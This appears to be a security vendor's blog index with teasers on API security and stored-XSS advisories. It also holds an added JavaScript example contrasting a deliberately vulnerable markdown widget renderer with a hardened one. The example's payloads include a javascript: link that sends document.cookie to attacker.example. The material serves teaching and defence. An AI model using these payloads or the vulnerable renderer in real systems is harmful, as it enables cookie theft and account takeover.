
Astra

API Security: A Technical Guide

In the rapidly changing field of software development, application programming interfaces (APIs) are very powerful tools. They allow different applications to communicate, share data, and collaborate seamlessly, constituting approximately 71% of all web traffic. However, as APIs become more essential to our applications, they also attract cyber threats. In fact, 57% of organizations reported experiencing at least one API-related data breach in the past two years.

10 Best API Security Testing Companies To Consider in 2025

Every single day, billions of API calls happen across the internet. Behind your favorite applications, APIs work quietly to move data and connect systems. But with the growing use of APIs, API attacks didn’t just increase – they exploded. Take the Optus breach in September 2022, in which attackers exploited an unprotected API endpoint and accessed the personal data of up to 9.8 million customers, leading to a $10 million fine.

What is Continuous Threat Exposure Management (CTEM)?

Coined by Gartner in 2022, continuous threat exposure management, or CTEM, is a structured framework for continuously assessing, prioritizing, validating, and remediating vulnerabilities across an organization's ever-expanding attack surface, so that you can respond effectively to the most pressing threats. Reactive security is a temporary fix, not a sustainable solution.

Stored XSS Vulnerability in Dynamic Dashboard Paragraph Widget

Product Name: Dynamic Dashboard
Vulnerability: Stored XSS
Vulnerable Version: >= 3.0.0, < 3.0.1
CVE: CVE-2024-47817

On October 5, 2024, security researchers at Astra discovered a severe Stored Cross-Site Scripting vulnerability in Dynamic Dashboard's paragraph widget. The widget, which renders text and markdown, does not adequately sanitize its input, allowing attackers to inject malicious code.

CVE-2024-9900: Stored XSS Vulnerability in Muddler's LocalAI

Product Name: LocalAI
Vulnerability: Stored XSS
Vulnerable Version: v2.21.1
CVE: CVE-2024-9900

Astra Security researchers identified a vulnerability in LocalAI, an open-source OpenAI alternative. The vulnerability, CVE-2024-9900, is a stored Cross-Site Scripting issue in the prompts of LocalAI v2.21.1, which accept malicious scripts and payloads as input.

Autumn 2024 Product Releases: What's New at Astra Security

As organizations grow and adopt cloud-native technologies, securing digital infrastructure at scale has become increasingly complex. According to the Cloud Security Alliance, 73% of organizations struggle to secure business-critical cloud applications due to misconfigurations and limited risk visibility. Ransomware alone can cost companies millions, and with the rise in cyber threats, even cyber insurance may not fully protect them from repeated attacks.

Stored XSS Vulnerability in bodi0's Easy Cache Plugin

Product Name: bodi0's Easy Cache
Vulnerability: Stored XSS
Vulnerable Version: Will be disclosed soon
CVE: Will be disclosed soon

On September 16, 2024, the team of pentesters at Astra Security found a stored Cross-Site Scripting (XSS) vulnerability in bodi0's Easy Cache, a WordPress plugin that optimizes caching to speed up page loads and reduce server load.
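The three advisories above (the Dynamic Dashboard paragraph widget, the LocalAI prompts, and the Easy Cache plugin) share one root cause: text an attacker saves once is later rendered as HTML for every viewer without adequate sanitization. The following is an added, constructed JavaScript example and is not code from any of those projects or from Astra; the in-memory widget store, the tiny markdown subset, and the payloads are assumptions chosen to show the vulnerable pattern beside a hardened renderer, not the specific injection points reported in the advisories.

```javascript
// Added illustration: stored XSS in a "paragraph" widget that renders
// user-supplied text/markdown, beside a hardened renderer. Constructed
// example; the store, markdown subset and payloads are assumptions.

// Stand-in for the dashboard's widget storage. The attacker saves text once,
// and it is rendered for every later viewer (that is what makes it "stored").
const widgetStore = new Map();

function saveWidgetText(widgetId, text) {
  widgetStore.set(widgetId, text);
}

// Markdown subset handled here: [label](url), **bold**, *italic*.
const LINK_RE = /\[([^\]]+)\]\(([^)\s]+)\)/g;

// VULNERABLE: the stored text is turned into HTML as-is. Any tag, event
// handler or javascript: URL the author typed reaches the viewer's browser.
function renderParagraphVulnerable(widgetId) {
  const text = widgetStore.get(widgetId) ?? '';
  const html = text
    .replace(LINK_RE, '<a href="$2">$1</a>')
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/\*(.+?)\*/g, '<em>$1</em>');
  return `<div class="paragraph-widget">${html}</div>`;
}

// HARDENED: escape HTML metacharacters in every user-controlled fragment
// before the renderer emits its own, fixed set of tags, and only accept
// http(s) link targets so a javascript: URL never lands in an href.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function safeHref(url) {
  try {
    // Absolute URLs only (assumption for this demo); anything else is dropped.
    const parsed = new URL(url);
    return parsed.protocol === 'http:' || parsed.protocol === 'https:' ? parsed.href : null;
  } catch {
    return null;
  }
}

// Bold/italic are applied to already-escaped text, so the only tags that can
// appear are the <strong>/<em> emitted right here.
function inlineMarkdown(escapedText) {
  return escapedText
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/\*(.+?)\*/g, '<em>$1</em>');
}

function renderParagraphSafe(widgetId) {
  const text = widgetStore.get(widgetId) ?? '';
  let out = '';
  let last = 0;
  for (const m of text.matchAll(LINK_RE)) {
    out += inlineMarkdown(escapeHtml(text.slice(last, m.index)));
    const href = safeHref(m[2]);
    const label = escapeHtml(m[1]);
    // Unsafe link target: keep the label as plain text, emit no anchor.
    out += href ? `<a href="${escapeHtml(href)}" rel="noopener">${label}</a>` : label;
    last = m.index + m[0].length;
  }
  out += inlineMarkdown(escapeHtml(text.slice(last)));
  return `<div class="paragraph-widget">${out}</div>`;
}

// Constructed payloads an attacker might save into the widget.
const PAYLOAD_TAG = 'Hello **team** <img src=x onerror="alert(document.cookie)">';
const PAYLOAD_LINK = "[click me](javascript:location='https://attacker.example/?c='+document.cookie)";
const BENIGN_LINK = '[docs](https://example.com/a?b=1&c=2)';

// Side-by-side rendering of each payload, returned for inspection or testing.
function demo() {
  saveWidgetText('tag', PAYLOAD_TAG);
  saveWidgetText('link', PAYLOAD_LINK);
  saveWidgetText('benign', BENIGN_LINK);
  const result = {};
  for (const id of ['tag', 'link', 'benign']) {
    result[id] = { vulnerable: renderParagraphVulnerable(id), safe: renderParagraphSafe(id) };
  }
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The hardened renderer escapes each fragment before interpreting markdown, rather than trying to strip "bad" tags from the finished HTML; denylisting tags is what leaves widgets like these open to encoding tricks and unexpected attributes. Note that escaping alone does not cover the link target, which is why the URL scheme is checked separately.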

Introducing The 403 Circle by Astra

This Cyber Security Awareness month, we’re thrilled to launch The 403 Circle, our new community-driven approach to building a safer world. It isn’t for everyone, but it might be for you. We are surrounded by an overwhelming trove of information, from AI chatbots and mile-long whitepapers to social networks or ‘communities’ that treat you like a product—to acquire, upsell, and renew contracts. At Astra, we strive to simplify proactive security.